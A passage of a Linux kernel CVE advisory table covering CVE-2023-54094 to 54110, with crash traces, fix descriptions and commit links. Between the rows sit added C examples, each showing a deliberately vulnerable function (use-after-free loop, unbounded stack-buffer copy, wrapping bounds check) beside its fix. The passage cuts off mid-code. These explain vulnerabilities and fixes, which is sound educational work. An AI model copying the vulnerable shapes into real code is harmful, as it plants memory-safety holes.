RDI: ffffa125952a14d4 [ 62.706970] RBP: ffffa124def8a000 R08: 0000000000000022 R09: 00002000001558c9 [ 62.714199] R10: 0000000000000000 R11: 00000000be554639 R12: 00000000000000e2 [ 62.721426] R13: ffffa125952a1400 R14: ffffa125952a1400 R15: 00002000001558c9 [ 62.728654] FS: 0000000000000000(0000) GS:ffffa127efa40000(0000) knlGS:0000000000000000 [ 62.736852] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 62.742702] CR2: 00000000000000c0 CR3: 00000001034b0000 CR4: 00000000003526e0 [ 62.749948] Call Trace: [ 62.752498] <TASK> [ 62.779267] inet_gso_segment (net/ipv4/af_inet.c:1398) [ 62.787605] skb_mac_gso_segment (net/core/gro.c:141) [ 62.791906] __skb_gso_segment (net/core/dev.c:3403 (discriminator 2)) [ 62.800492] validate_xmit_skb (./include/linux/netdevice.h:4862 net/core/dev.c:3659) [ 62.804695] validate_xmit_skb_list (net/core/dev.c:3710) [ 62.809158] sch_direct_xmit (net/sched/sch_generic.c:330) [ 62.813198] __dev_queue_xmit (net/core/dev.c:3805 net/core/dev.c:4210) net/netfilter/core.c:626) [ 62.821093] br_dev_queue_push_xmit (net/bridge/br_forward.c:55) [ 62.825652] maybe_deliver (net/bridge/br_forward.c:193) [ 62.829420] br_flood (net/bridge/br_forward.c:233) [ 62.832758] br_handle_frame_finish (net/bridge/br_input.c:215) [ 62.837403] br_handle_frame (net/bridge/br_input.c:298 net/bridge/br_input.c:416) [ 62.851417] __netif_receive_skb_core.constprop.0 (net/core/dev.c:5387) [ 62.866114] __netif_receive_skb_list_core (net/core/dev.c:5570) [ 62.871367] netif_receive_skb_list_internal (net/core/dev.c:5638 net/core/dev.c:5727) [ 62.876795] napi_complete_done (./include/linux/list.h:37 ./include/net/gro.h:434 ./include/net/gro.h:429 net/core/dev.c:6067) [ 62.881004] ixgbe_poll (drivers/net/ethernet/intel/ixgbe/ixgbe_main.c:3191) [ 62.893534] __napi_poll (net/core/dev.c:6498) [ 62.897133] napi_threaded_poll (./include/linux/netpoll.h:89 net/core/dev.c:6640) [ 62.905276] kthread (kernel/kthread.c:379) [ 62.913435] ret_from_fork (arch/x86/entry/entry_64.S:314) [ 62.917119] </TASK> In the critical scenario, rx-gro-list GRO-ed packets are fed, via a bridge, both to the local input path and to an egress device (tun). The segmentation of such packets unsafely writes to the cloned skbs with shared heads. This change addresses the issue by uncloning as needed the to-be-segmented skbs. | 2025-12-24 | not yet calculated | CVE-2023-54094 | https://git.kernel.org/stable/c/bc3ab5d2ab69823f5cff89cf74ef78ffa0386c9a https://git.kernel.org/stable/c/ea438eed94ac0fe69b93ac034738823c0e989a12 https://git.kernel.org/stable/c/1731234e8b60063eae858c77b55c7a88f5084353 https://git.kernel.org/stable/c/7a59f29961cf97b98b02acaadf5a0b1f8dde938c https://git.kernel.org/stable/c/c329b261afe71197d9da83c1f18eb45a7e97e089 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/iommu: Fix notifiers being shared by PCI and VIO buses fail_iommu_setup() registers the fail_iommu_bus_notifier struct to both PCI and VIO buses. struct notifier_block is a linked list node, so this causes any notifiers later registered to either bus type to also be registered to the other since they share the same node. This causes issues in (at least) the vgaarb code, which registers a notifier for PCI buses. pci_notify() ends up being called on a vio device, converted with to_pci_dev() even though it's not a PCI device, and finally makes a bad access in vga_arbiter_add_pci_device() as discovered with KASAN: BUG: KASAN: slab-out-of-bounds in vga_arbiter_add_pci_device+0x60/0xe00 Read of size 4 at addr c000000264c26fdc by task swapper/0/1 Call Trace: dump_stack_lvl+0x1bc/0x2b8 (unreliable) print_report+0x3f4/0xc60 kasan_report+0x244/0x698 __asan_load4+0xe8/0x250 vga_arbiter_add_pci_device+0x60/0xe00 pci_notify+0x88/0x444 notifier_call_chain+0x104/0x320 blocking_notifier_call_chain+0xa0/0x140 device_add+0xac8/0x1d30 device_register+0x58/0x80 vio_register_device_node+0x9ac/0xce0 vio_bus_scan_register_devices+0xc4/0x13c __machine_initcall_pseries_vio_device_init+0x94/0xf0 do_one_initcall+0x12c/0xaa8 kernel_init_freeable+0xa48/0xba8 kernel_init+0x64/0x400 ret_from_kernel_thread+0x5c/0x64 Fix this by creating separate notifier_block structs for each bus type. [mpe: Add #ifdef to fix CONFIG_IBMVIO=n build] | 2025-12-24 | not yet calculated | CVE-2023-54095 | https://git.kernel.org/stable/c/dc0d107e624ca96aef6dd8722eb33ba3a6d157b0 https://git.kernel.org/stable/c/075a4dcdbc9a5ea793cb8ec8b78a6c0b7636fd52 https://git.kernel.org/stable/c/65bf8a196ba25cf65a858b5bb8de80f0aad76691 https://git.kernel.org/stable/c/f08944e3c6962b00827de7263a9e20688e79ad84 https://git.kernel.org/stable/c/a9ddbfed53465bc7c411231db32a488066c0c1be https://git.kernel.org/stable/c/f17d5efaafba3d5f02f0373f7c5f44711d676f3e https://git.kernel.org/stable/c/c46af58588253e5e4063bb5ddc78cd12fdf9e55d https://git.kernel.org/stable/c/6670c65bf863cd0d44ca24d4c10ef6755b8d9529 https://git.kernel.org/stable/c/c37b6908f7b2bd24dcaaf14a180e28c9132b9c58 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soundwire: fix enumeration completion The soundwire subsystem uses two completion structures that allow drivers to wait for soundwire device to become enumerated on the bus and initialised by their drivers, respectively. The code implementing the signalling is currently broken as it does not signal all current and future waiters and also uses the wrong reinitialisation function, which can potentially lead to memory corruption if there are still waiters on the queue. Not signalling future waiters specifically breaks sound card probe deferrals as codec drivers can not tell that the soundwire device is already attached when being reprobed. Some codec runtime PM implementations suffer from similar problems as waiting for enumeration during resume can also timeout despite the device already having been enumerated. | 2025-12-24 | not yet calculated | CVE-2023-54096 | https://git.kernel.org/stable/c/48d1d0ce0782f995fda678508fdae35c5e9593f0 https://git.kernel.org/stable/c/a36b522767f3a72688893a472e80c9aa03e67eda https://git.kernel.org/stable/c/e1d54962a63b6ec04ed0204a3ecca942fde3a6fe https://git.kernel.org/stable/c/c5265691cd065464d795de5666dcfb89c26b9bc1 https://git.kernel.org/stable/c/c40d6b3249b11d60e09d81530588f56233d9aa44 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regulator: stm32-pwr: fix of_iomap leak Smatch reports: drivers/regulator/stm32-pwr.c:166 stm32_pwr_regulator_probe() warn: 'base' from of_iomap() not released on lines: 151,166. In stm32_pwr_regulator_probe(), base is not released when devm_kzalloc() fails to allocate memory or devm_regulator_register() fails to register a new regulator device, which may cause a leak. To fix this issue, replace of_iomap() with devm_platform_ioremap_resource(). devm_platform_ioremap_resource() is a specialized function for platform devices. It allows 'base' to be automatically released whether the probe function succeeds or fails. Besides, use IS_ERR(base) instead of !base as the return value of devm_platform_ioremap_resource() can either be a pointer to the remapped memory or an ERR_PTR() encoded error code if the operation fails. | 2025-12-24 | not yet calculated | CVE-2023-54097 | https://git.kernel.org/stable/c/824683dbec234a01bd49a0589ee3323594a6f4cf https://git.kernel.org/stable/c/dfce9bb3517a78507cf96f9b83948d0b81338afa https://git.kernel.org/stable/c/ad6481f49fb2c703efa3a929643934f24b666d6a https://git.kernel.org/stable/c/f25994f7a9ad53eb756bc4869497c3ebe281ad5e https://git.kernel.org/stable/c/c091bb49b3233307c7af73dae888f0799752af3d https://git.kernel.org/stable/c/0ad07e02be0d3f0d554653382ffe53ae4879378d https://git.kernel.org/stable/c/c4a413e56d16a2ae84e6d8992f215c4dcc7fac20 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/i915/gvt: fix gvt debugfs destroy When gvt debug fs is destroyed, need to have a sane check if drm minor's debugfs root is still available or not, otherwise in case like device remove through unbinding, drm minor's debugfs directory has already been removed, then intel_gvt_debugfs_clean() would act upon dangling pointer like below oops. i915 0000:00:02.0: Direct firmware load for i915/gvt/vid_0x8086_did_0x1926_rid_0x0a.golden_hw_state failed with error -2 i915 0000:00:02.0: MDEV: Registered Console: switching to colour dummy device 80x25 i915 0000:00:02.0: MDEV: Unregistering BUG: kernel NULL pointer dereference, address: 00000000000000a0 PGD 0 P4D 0 Oops: 0002 [#1] PREEMPT SMP PTI CPU: 2 PID: 2486 Comm: gfx-unbind.sh Tainted: G I 6.1.0-rc8+ #15 Hardware name: Dell Inc. XPS 13 9350/0JXC1H, BIOS 1.13.0 02/10/2020 RIP: 0010:down_write+0x1f/0x90 Code: 1d ff ff 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 53 48 89 fb e8 62 c0 ff ff bf 01 00 00 00 e8 28 5e 31 ff 31 c0 ba 01 00 00 00 <f0> 48 0f b1 13 75 33 65 48 8b 04 25 c0 bd 01 00 48 89 43 08 bf 01 RSP: 0018:ffff9eb3036ffcc8 EFLAGS: 00010246 RAX: 0000000000000000 RBX: 00000000000000a0 RCX: ffffff8100000000 RDX: 0000000000000001 RSI: 0000000000000064 RDI: ffffffffa48787a8 RBP: ffff9eb3036ffd30 R08: ffffeb1fc45a0608 R09: ffffeb1fc45a05c0 R10: 0000000000000002 R11: 0000000000000000 R12: 0000000000000000 R13: ffff91acc33fa328 R14: ffff91acc033f080 R15: ffff91acced533e0 FS: 00007f6947bba740(0000) GS:ffff91ae36d00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00000000000000a0 CR3: 00000001133a2002 CR4: 00000000003706e0 Call Trace: <TASK> simple_recursive_removal+0x9f/0x2a0 ? start_creating.part.0+0x120/0x120 ? _raw_spin_lock+0x13/0x40 debugfs_remove+0x40/0x60 intel_gvt_debugfs_clean+0x15/0x30 [kvmgt] intel_gvt_clean_device+0x49/0xe0 [kvmgt] intel_gvt_driver_remove+0x2f/0xb0 i915_driver_remove+0xa4/0xf0 i915_pci_remove+0x1a/0x30 pci_device_remove+0x33/0xa0 device_release_driver_internal+0x1b2/0x230 unbind_store+0xe0/0x110 kernfs_fop_write_iter+0x11b/0x1f0 vfs_write+0x203/0x3d0 ksys_write+0x63/0xe0 do_syscall_64+0x37/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd RIP: 0033:0x7f6947cb5190 Code: 40 00 48 8b 15 71 9c 0d 00 f7 d8 64 89 02 48 c7 c0 ff ff ff ff eb b7 0f 1f 00 80 3d 51 24 0e 00 00 74 17 b8 01 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 58 c3 0f 1f 80 00 00 00 00 48 83 ec 28 48 89 RSP: 002b:00007ffcbac45a28 EFLAGS: 00000202 ORIG_RAX: 0000000000000001 RAX: ffffffffffffffda RBX: 000000000000000d RCX: 00007f6947cb5190 RDX: 000000000000000d RSI: 0000555e35c866a0 RDI: 0000000000000001 RBP: 0000555e35c866a0 R08: 0000000000000002 R09: 0000555e358cb97c R10: 0000000000000000 R11: 0000000000000202 R12: 0000000000000001 R13: 000000000000000d R14: 0000000000000000 R15: 0000555e358cb8e0 </TASK> Modules linked in: kvmgt CR2: 00000000000000a0 ---[ end trace 0000000000000000 ]--- | 2025-12-24 | not yet calculated | CVE-2023-54098 | https://git.kernel.org/stable/c/bb7c7b2c89d2feb347b6f9bffc1c75987adb1048 https://git.kernel.org/stable/c/ae9a61511736cc71a99f01e8b7b90f6fb6128ed8 https://git.kernel.org/stable/c/b85c8536fda3d1ed07c6d87a661ffe18d6eb214b https://git.kernel.org/stable/c/fe340500baf84b6531c9fc508b167525b9bf6446 https://git.kernel.org/stable/c/c4b850d1f448a901fbf4f7f36dec38c84009b489 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs: Protect reconfiguration of sb read-write from racing writes The reconfigure / remount code takes a lot of effort to protect filesystem's reconfiguration code from racing writes on remounting read-only. However during remounting read-only filesystem to read-write mode userspace writes can start immediately once we clear SB_RDONLY flag. This is inconvenient for example for ext4 because we need to do some writes to the filesystem (such as preparation of quota files) before we can take userspace writes so we are clearing SB_RDONLY flag before we are fully ready to accept userspace writes and syzbot has found a way to exploit this [1]. Also as far as I'm reading the code the filesystem remount code was protected from racing writes in the legacy mount path by the mount's MNT_READONLY flag so this is relatively new problem. It is actually fairly easy to protect remount read-write from racing writes using sb->s_readonly_remount flag so let's just do that instead of having to workaround these races in the filesystem code. [1] https://lore.kernel.org/all/00000000000006a0df05f6667499@google.com/T/ | 2025-12-24 | not yet calculated | CVE-2023-54099 | https://git.kernel.org/stable/c/0336b42456e485fda1006b5b411e7372e20fbf03 https://git.kernel.org/stable/c/7e4e87ec56aa6d008c64eab31b340a7c452b26cc https://git.kernel.org/stable/c/0ccfe21949bc9f706a86ee7351b74375c0745757 https://git.kernel.org/stable/c/295ef44a2abaf97d7a594b1d4c60d4be3738191f https://git.kernel.org/stable/c/4abda85197ba5d695e6040d580b4b409ce0d3733 https://git.kernel.org/stable/c/c541dce86c537714b6761a79a969c1623dfa222b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qedi: Fix use after free bug in qedi_remove() In qedi_probe() we call __qedi_probe() which initializes &qedi->recovery_work with qedi_recovery_handler() and &qedi->board_disable_work with qedi_board_disable_work(). When qedi_schedule_recovery_handler() is called, schedule_delayed_work() will finally start the work. In qedi_remove(), which is called to remove the driver, the following sequence may be observed: Fix this by finishing the work before cleanup in qedi_remove(). CPU0 CPU1 |qedi_recovery_handler qedi_remove | __qedi_remove | iscsi_host_free | scsi_host_put | //free shost | |iscsi_host_for_each_session |//use qedi->shost Cancel recovery_work and board_disable_work in __qedi_remove(). | 2025-12-24 | not yet calculated | CVE-2023-54100 | https://git.kernel.org/stable/c/fa19c533ab19161298f0780bcc6523af88f6fd20 https://git.kernel.org/stable/c/5e756a59cee6a8a79b9059c5bdf0ecbf5bb8d151 https://git.kernel.org/stable/c/3738a230831e861503119ee2691c4a7dc56ed60a https://git.kernel.org/stable/c/89f6023fc321c958a0fb11f143a6eb4544ae3940 https://git.kernel.org/stable/c/124027cd1a624ce0347adcd59241a9966a726b22 https://git.kernel.org/stable/c/c5749639f2d0a1f6cbe187d05f70c2e7c544d748 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: driver: soc: xilinx: use _safe loop iterator to avoid a use after free The hash_for_each_possible() loop dereferences "eve_data" to get the next item on the list. However the loop frees eve_data so it leads to a use after free. Use hash_for_each_possible_safe() instead. | 2025-12-24 | not yet calculated | CVE-2023-54101 | https://git.kernel.org/stable/c/49fca83f6f3f0cafe5bf5b43e8ee81cf73c2d5e0 https://git.kernel.org/stable/c/f16599e638073ef0b2828bb64f5e99138e9381b5 https://git.kernel.org/stable/c/256aace3a5d8c987183ba4832dffb36f48ea7d3b https://git.kernel.org/stable/c/c58da0ba3e5c86e51e2c1557afaf6f71e00c4533 |
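Added example for the xilinx entry above; this is not the driver's code and not part of the advisory. A singly linked bucket stands in for the hash chain, struct eve_data and cb_type are modelled on the entry's wording, and the function names are this example's own. It shows the iterator shape that frees the node it is about to read next, beside the "_safe" shape that caches the next pointer first.

```c
/*
 * Added example, not the xilinx driver's code: a userspace model of the
 * use-after-free in the CVE-2023-54101 entry. The bucket/list layout,
 * the cb_type field and every function name here are this example's
 * assumptions.
 */
#include <stdio.h>
#include <stdlib.h>

struct eve_data {
    unsigned int cb_type;
    struct eve_data *next;    /* stand-in for the hlist node */
};

struct bucket {
    struct eve_data *first;
};

/* Pre-fix shape (NOT called below): the loop advance reads n->next after
 * release() has freed n, which is the use-after-free the entry describes.
 * release is a callback only so the compiler cannot see the free; the
 * loop shape is the point. Do not run it. */
int remove_matching_unsafe(struct bucket *b, unsigned int cb_type,
                           void (*release)(struct eve_data *))
{
    struct eve_data **pp = &b->first, *n;
    int removed = 0;

    for (n = b->first; n; n = n->next) {      /* n->next read from freed memory */
        if (n->cb_type == cb_type) {
            *pp = n->next;                    /* hash_del() */
            release(n);                       /* kfree(eve_data) */
            removed++;
        } else {
            pp = &n->next;
        }
    }
    return removed;
}

/* Fixed shape: hash_for_each_possible_safe() caches the next pointer in a
 * temporary before the body runs, so freeing the current node is safe.
 * Returns how many entries were unlinked and freed. */
int remove_matching_safe(struct bucket *b, unsigned int cb_type)
{
    struct eve_data **pp = &b->first, *n, *tmp;
    int removed = 0;

    for (n = b->first; n; n = tmp) {
        tmp = n->next;                        /* saved before any free */
        if (n->cb_type == cb_type) {
            *pp = tmp;
            free(n);
            removed++;
        } else {
            pp = &n->next;
        }
    }
    return removed;
}

/* Constructed sample chain: one node per cb_type in the array, in order. */
static void build_bucket(struct bucket *b, const unsigned int *types, int n)
{
    b->first = NULL;
    for (int i = n - 1; i >= 0; i--) {
        struct eve_data *e = calloc(1, sizeof *e);
        if (!e) { perror("calloc"); exit(1); }
        e->cb_type = types[i];
        e->next = b->first;
        b->first = e;
    }
}

int bucket_len(const struct bucket *b)
{
    int len = 0;
    for (const struct eve_data *n = b->first; n; n = n->next)
        len++;
    return len;
}

static void free_bucket(struct bucket *b)
{
    struct eve_data *n = b->first, *tmp;
    while (n) { tmp = n->next; free(n); n = tmp; }
    b->first = NULL;
}

static const unsigned int sample_types[] = { 1, 2, 1, 3, 1 };   /* constructed */

/* Removes every cb_type == 1 entry from the sample chain; returns how many. */
int scenario_removed(void)
{
    struct bucket b;
    build_bucket(&b, sample_types, 5);
    int removed = remove_matching_safe(&b, 1);
    free_bucket(&b);
    return removed;
}

/* Entries left in the sample chain after that removal. */
int scenario_remaining(void)
{
    struct bucket b;
    build_bucket(&b, sample_types, 5);
    remove_matching_safe(&b, 1);
    int left = bucket_len(&b);
    free_bucket(&b);
    return left;
}

int main(void)
{
    printf("removed %d, remaining %d\n", scenario_removed(), scenario_remaining());
    return 0;
}
```

Under KASAN the unsafe loop reports a slab-use-after-free on the `n = n->next` read the moment a matching node is freed; the safe form is the same loop with one extra temporary, which is exactly what the kernel's `hash_for_each_possible_safe()` expands to.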
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: lpfc: Prevent lpfc_debugfs_lockstat_write() buffer overflow A static code analysis tool flagged the possibility of buffer overflow when using copy_from_user() for a debugfs entry. Currently, it is possible that copy_from_user() copies more bytes than what would fit in the mybuf char array. Add a min() restriction check between sizeof(mybuf) - 1 and nbytes passed from the userspace buffer to protect against buffer overflow. | 2025-12-24 | not yet calculated | CVE-2023-54102 | https://git.kernel.org/stable/c/644a9d5e22761a41d5005a26996a643da96de962 https://git.kernel.org/stable/c/e0e7faee3a7dd6f51350cda64997116a247eb045 https://git.kernel.org/stable/c/f91037487036e2d2f18d3c2481be6b9a366bde7f https://git.kernel.org/stable/c/a9df88cb31dcbd72104ec5883f35cbc1fb587e47 https://git.kernel.org/stable/c/ad050f6cf681ebb850a9d4bc19474d3896476301 https://git.kernel.org/stable/c/c6087b82a9146826564a55c5ca0164cac40348f5 |
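Added example for the lpfc entry above; this is not lpfc code and not part of the advisory. It is a userspace model of a debugfs `.write` handler with a fixed-size stack buffer: `memcpy` stands in for `copy_from_user`, and the 64-byte buffer, the "on"/"off" commands and the function names are this example's assumptions. It shows the unbounded copy beside the `min()`-clamped one the entry describes.

```c
/*
 * Added example, not lpfc code: a userspace model of the bounded copy in
 * the CVE-2023-54102 entry. MYBUF_SZ, the command strings, the memcpy
 * stand-in for copy_from_user and the function names are this example's
 * assumptions.
 */
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MYBUF_SZ 64

struct lockstat {
    int enabled;
};

/* Shared state for the demo calls below. */
struct lockstat demo_ls;

/* Parses the NUL-terminated command the handler copied in. */
static int apply_command(struct lockstat *ls, const char *cmd)
{
    if (strncmp(cmd, "on", 2) == 0)
        ls->enabled = 1;
    else if (strncmp(cmd, "off", 3) == 0)
        ls->enabled = 0;
    else
        return -EINVAL;
    return 0;
}

/* Pre-fix shape (NOT called below): nbytes comes straight from the
 * write(2) caller, so a 200-byte write overruns the 64-byte stack buffer. */
long lockstat_write_vuln(struct lockstat *ls, const char *ubuf, size_t nbytes)
{
    char mybuf[MYBUF_SZ] = { 0 };

    memcpy(mybuf, ubuf, nbytes);                 /* unbounded copy_from_user */
    if (apply_command(ls, mybuf))
        return -EINVAL;
    return (long)nbytes;
}

/* Post-fix shape: the copy is clamped to sizeof(mybuf) - 1 so the
 * terminating NUL always fits. Returns the number of bytes consumed. */
long lockstat_write_fixed(struct lockstat *ls, const char *ubuf, size_t nbytes)
{
    char mybuf[MYBUF_SZ] = { 0 };
    size_t n = nbytes < sizeof(mybuf) - 1 ? nbytes : sizeof(mybuf) - 1;  /* min() */

    memcpy(mybuf, ubuf, n);                      /* bounded copy_from_user */
    mybuf[n] = '\0';
    if (apply_command(ls, mybuf))
        return -EINVAL;
    return (long)n;
}

/* Constructed oversized write: "on" followed by 198 filler bytes, the kind
 * of input the static analyser flagged. Returns the bytes consumed. */
long scenario_oversized_write(struct lockstat *ls)
{
    char big[200];

    memset(big, 'A', sizeof big);
    big[0] = 'o';
    big[1] = 'n';
    return lockstat_write_fixed(ls, big, sizeof big);
}

int main(void)
{
    long n = scenario_oversized_write(&demo_ls);

    printf("200-byte write: consumed %ld bytes, enabled=%d\n", n, demo_ls.enabled);
    return 0;
}
```

Note the clamp uses `sizeof(mybuf) - 1`, not `sizeof(mybuf)`: the extra byte is what keeps the later string parse from running off the end of the buffer.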
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: mtk-jpeg: Fix use after free bug due to uncanceled work In mtk_jpeg_probe, &jpeg->job_timeout_work is bound with mtk_jpeg_job_timeout_work. Then mtk_jpeg_dec_device_run and mtk_jpeg_enc_device_run may be called to start the work. If we remove the module which will call mtk_jpeg_remove to make cleanup, there may be an unfinished work. The possible sequence is as follows, which will cause a typical UAF bug. Fix it by canceling the work before cleanup in the mtk_jpeg_remove CPU0 CPU1 |mtk_jpeg_job_timeout_work mtk_jpeg_remove | v4l2_m2m_release | kfree(m2m_dev); | | | v4l2_m2m_get_curr_priv | m2m_dev->curr_ctx //use | 2025-12-24 | not yet calculated | CVE-2023-54103 | https://git.kernel.org/stable/c/d346a2ef6b1ebb77d740890cfaf8478c5b286380 https://git.kernel.org/stable/c/d56dbfe750a8f96789cc86a911864f663e63bc5d https://git.kernel.org/stable/c/715c0200b4809396998e562ce5cd0284e7314cc1 https://git.kernel.org/stable/c/8977d9924843823f46696d7d9432ea4b2499ed14 https://git.kernel.org/stable/c/2fc20f8bcc2b4d31c808a5320506c31aa2cf3834 https://git.kernel.org/stable/c/c677d7ae83141d390d1253abebafa49c962afb52 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mtd: rawnand: fsl_upm: Fix an off-by-one test in fun_exec_op() 'op->cs' is copied in 'fun->mchip_number' which is used to access the 'mchip_offsets' and the 'rnb_gpio' arrays. These arrays have NAND_MAX_CHIPS elements, so the index must be below this limit. Fix the sanity check in order to avoid the NAND_MAX_CHIPS value. This would lead to out-of-bound accesses. | 2025-12-24 | not yet calculated | CVE-2023-54104 | https://git.kernel.org/stable/c/1f09d67d390647f83f8f9d26382b0daa43756e6f https://git.kernel.org/stable/c/eb7a5e4d14c8659cb97db6863316280e15f67209 https://git.kernel.org/stable/c/f4b700c71802c81e6f9dce362ee7a0312c8377ba https://git.kernel.org/stable/c/49e57caf967a969f6b955c88805f2d160910aa12 https://git.kernel.org/stable/c/c6abce60338aa2080973cd95be0aedad528bb41f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: can: isotp: check CAN address family in isotp_bind() Add missing check to block non-AF_CAN binds. Syzbot created some code which matched the right sockaddr struct size but used AF_XDP (0x2C) instead of AF_CAN (0x1D) in the address family field: bind$xdp(r2, &(0x7f0000000540)={0x2c, 0x0, r4, 0x0, r2}, 0x10) ^^^^ This has no functional impact but the userspace should be notified about the wrong address family field content. | 2025-12-24 | not yet calculated | CVE-2023-54105 | https://git.kernel.org/stable/c/de3c02383aa678f6799402ac47fdd89cf4bfcaa9 https://git.kernel.org/stable/c/2fc6f337257f4f7c21ecff429241f7acaa6df4e8 https://git.kernel.org/stable/c/9427584c2f153d0677ef3bad6f44028c60d728c4 https://git.kernel.org/stable/c/dd4faace51e41a82a8c0770ee0cc26088f9d9d06 https://git.kernel.org/stable/c/c6adf659a8ba85913e16a571d5a9bcd17d3d1234 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: fix potential memory leak in mlx5e_init_rep_rx The memory pointed to by the priv->rx_res pointer is not freed in the error path of mlx5e_init_rep_rx, which can lead to a memory leak. Fix by freeing the memory in the error path, thereby making the error path identical to mlx5e_cleanup_rep_rx(). | 2025-12-24 | not yet calculated | CVE-2023-54106 | https://git.kernel.org/stable/c/0582a3caaa3e2f7b80bcb113ad3c910eac15a63e https://git.kernel.org/stable/c/c265d8c2e25546a6b7ee16d36f2bb79b6160c2c3 https://git.kernel.org/stable/c/c6cf0b6097bf1bf1b2a89b521e9ecd26b581a93a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: blk-cgroup: dropping parent refcount after pd_free_fn() is done Some cgroup policies will access parent pd through child pd even after pd_offline_fn() is done. If pd_free_fn() for parent is called before child, then UAF can be triggered. Hence it's better to guarantee the order of pd_free_fn(). Currently refcount of parent blkg is dropped in __blkg_release(), which is before pd_free_fn() is called in blkg_free_work_fn() while blkg_free_work_fn() is called asynchronously. This patch makes sure pd_free_fn() called from removing cgroup is ordered by delaying dropping parent refcount after calling pd_free_fn() for child. BTW, pd_free_fn() will also be called from blkcg_deactivate_policy() from deleting device, and following patches will guarantee the order. | 2025-12-24 | not yet calculated | CVE-2023-54107 | https://git.kernel.org/stable/c/c7241babf0855d8a6180cd1743ff0ec34de40b4e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: Fix DMA-API call trace on NVMe LS requests The following message and call trace was seen with debug kernels: DMA-API: qla2xxx 0000:41:00.0: device driver failed to check map error [device address=0x00000002a3ff38d8] [size=1024 bytes] [mapped as single] WARNING: CPU: 0 PID: 2930 at kernel/dma/debug.c:1017 check_unmap+0xf42/0x1990 Call Trace: debug_dma_unmap_page+0xc9/0x100 qla_nvme_ls_unmap+0x141/0x210 [qla2xxx] Remove DMA mapping from the driver altogether, as it is already done by FC layer. This prevents the warning. | 2025-12-24 | not yet calculated | CVE-2023-54108 | https://git.kernel.org/stable/c/3a564de3a299856f2cbd289649cea2e20d671a43 https://git.kernel.org/stable/c/e596253113b69b4018818260bd5da40c201bee73 https://git.kernel.org/stable/c/77302fb0e357da666d5249a6e91078feeef3dade https://git.kernel.org/stable/c/3ee4f1991c54c6707aa9df47e51c02ea25bb63e3 https://git.kernel.org/stable/c/ad6af23593594402c826eefdf43ae174e5f0f202 https://git.kernel.org/stable/c/c75e6aef5039830cce5d4cf764dd204522f89e6b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: rcar_fdp1: Fix refcount leak in probe and remove function rcar_fcp_get() takes a reference, which should be balanced with rcar_fcp_put(). Add missing rcar_fcp_put() in fdp1_remove and the error paths of fdp1_probe() to fix this. [hverkuil: resolve merge conflict, remove() is now void] | 2025-12-24 | not yet calculated | CVE-2023-54109 | https://git.kernel.org/stable/c/418a8f3140e07f33bbd5a81625d0ef46c0732cef https://git.kernel.org/stable/c/9df630dafa1a59946d1da6f070d4cb64f14ea57c https://git.kernel.org/stable/c/1acb982e3616e70128994fdecf2368a259c8a489 https://git.kernel.org/stable/c/2322b262d2205720518785c2706a3283725ba402 https://git.kernel.org/stable/c/45b7461d914c867ef21c74798da8c42d13d3a0df https://git.kernel.org/stable/c/59c6addfaaaa09ff7654e4d8793cb16fd22a46d4 https://git.kernel.org/stable/c/48765ca7c6b71bf73a4cc8475a4bad9e2633cf61 https://git.kernel.org/stable/c/c766c90faf93897b77c9c5daa603cffab85ba907 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: rndis_host: Secure rndis_query check against int overflow Variables off and len typed as uint32 in rndis_query function are controlled by incoming RNDIS response message thus their value may be manipulated. Setting off to an unexpectedly large value will cause the sum with len and 8 to overflow and pass the implemented validation step. Consequently the response pointer will be referring to a location past the expected buffer boundaries allowing information leakage e.g. via RNDIS_OID_802_3_PERMANENT_ADDRESS OID. | 2025-12-24 | not yet calculated | CVE-2023-54110 | https://git.kernel.org/stable/c/55782f6d63a5a3dd3b84c1e0627738fc5b146b4e https://git.kernel.org/stable/c/02ffb4ecf0614c58e3d0e5bfbe99588c9ddc77c0 https://git.kernel.org/stable/c/ebe6d2fcf7835f98cdbb1bd5e0414be20c321578 https://git.kernel.org/stable/c/232ef345e5d76e5542f430a29658a85dbef07f0b https://git.kernel.org/stable/c/11cd4ec6359d90b13ffb8f85a9df8637f0cf8d95 https://git.kernel.org/stable/c/39eadaf5611ddd064ad1c53da65c02d2b0fe22a4 https://git.kernel.org/stable/c/a713602807f32afc04add331410c77ef790ef77a https://git.kernel.org/stable/c/c7dd13805f8b8fc1ce3b6d40f6aff47e66b72ad2 |
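Added example for the rndis_host entry above; this is not rndis_host code and not part of the advisory. It is a userspace model of the bounds check on the device-supplied offset/length pair: the wrapping 32-bit sum beside a per-term check, plus a 64-bit ground-truth check and a small extraction of the 6-byte permanent-address reply. The 1025-byte CONTROL_BUFFER_SIZE, the 8-byte header the offset is relative to, the sample response bytes and the function names are this example's assumptions.

```c
/*
 * Added example, not rndis_host code: a userspace model of the integer
 * overflow in the CVE-2023-54110 entry. CONTROL_BUFFER_SIZE, REPLY_HDR,
 * the sample response and the function names are this example's
 * assumptions.
 */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CONTROL_BUFFER_SIZE 1025   /* assumed size of the driver's control buffer */
#define REPLY_HDR 8                /* bytes before the payload that `off` is relative to */

/* Pre-fix check: every term is u32, so 8 + off + len wraps when the device
 * sends a huge `off`; the sum looks small and the check passes. */
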